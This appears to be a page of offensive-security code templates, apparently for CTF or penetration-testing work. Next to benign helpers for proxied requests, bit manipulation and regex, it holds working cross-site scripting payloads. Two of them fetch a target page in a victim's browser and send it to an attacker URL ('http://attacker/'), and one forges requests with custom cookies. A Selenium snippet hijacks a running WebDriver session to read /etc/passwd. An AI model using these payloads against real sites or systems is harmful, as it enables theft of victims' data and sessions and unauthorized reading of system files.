Templates

Post request with session

import requests
import re

http_proxy  = "http://127.0.0.1:8080"
proxyDict = { 
              "http"  : http_proxy, 
            }
 # get a session
r = requests.get('http://')
# send request
r = requests.post('<url>', data={'key': 'value'}, cookies={'PHPSESSID': r.cookies['PHPSESSID']} , proxies=proxyDict)

XSS web request on behalf of victim, sending complete webpage back

xhr = new XMLHttpRequest();
xhr.onload = function() {
  x = new XMLHttpRequest();
  x.open("GET", '<our_url>?'+xhr.response);
  x.send(null);
}
xhr.open("GET", '<target_url>');
xhr.send(null);

Alternative using fetch:

fetch('http://target', { credentials: 'include'}).then(res=>res.text()).then((r)=>fetch("http://attacker/?x="/*+btoa(r)*/,{credentials: 'include', "method":"POST", "body":btoa(r)}));

XSS post request on behalf of the victim, with custom cookies

var xhr = new XMLHttpRequest();
document.cookie = "key=value;";
var uri ="<target uri>";
xhr = new XMLHttpRequest();
xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("<post body>");

Manipulate bitstring

# Convert bit string to byte array
def bitstring_to_bytes(s):
    v = int(s, 2)
    b = bytearray()
    while v:
        b.append(v & 0xff)
        v >>= 8
    return bytes(b[::-1])

base = "010101..." # the bit string
n = 8 # change something every n bits
result = ""
# Iterate over bitstring, doing something  every n bits
for i in xrange(n,len(base)-n,n):
    # do manipulation here
    result += num
print(bitstring_to_bytes(result))

Named capture groups

m = re.search('[e]\s:\s(?P<e>\d+){0,1}',text.decode('utf-8'))
  if m != None and 'e' in m.groupdict():
    e = int(m.group('e'))

Use Selenium to read local files

'''
curl -d '{"capabilities": {"firstMatch": [{"browserName": "firefox", "moz:firefoxOptions": {"args": [ "-headless"], "log": {"level": "trace"}}}]}}' http://127.0.0.1:41145/session
'''
from selenium import webdriver
from selenium.webdriver.remote.webdriver import WebDriver

def attach_to_session(executor_url, session_id):
    original_execute = WebDriver.execute
    def new_command_execute(self, command, params=None):
        if command == "newSession":
            return {'success': 0, 'value': None, 'sessionId': session_id}
        else:
            return original_execute(self, command, params)
    WebDriver.execute = new_command_execute
    driver = webdriver.Remote(command_executor=executor_url, desired_capabilities={})
    driver.session_id = session_id
    WebDriver.execute = original_execute
    return driver

bro = attach_to_session('http://127.0.0.1:41145', 'bb2d2142-8a61-446b-9bcc-16751ce20b49')
bro.get('file:///etc/passwd')
print(bro.page_source)

Last updated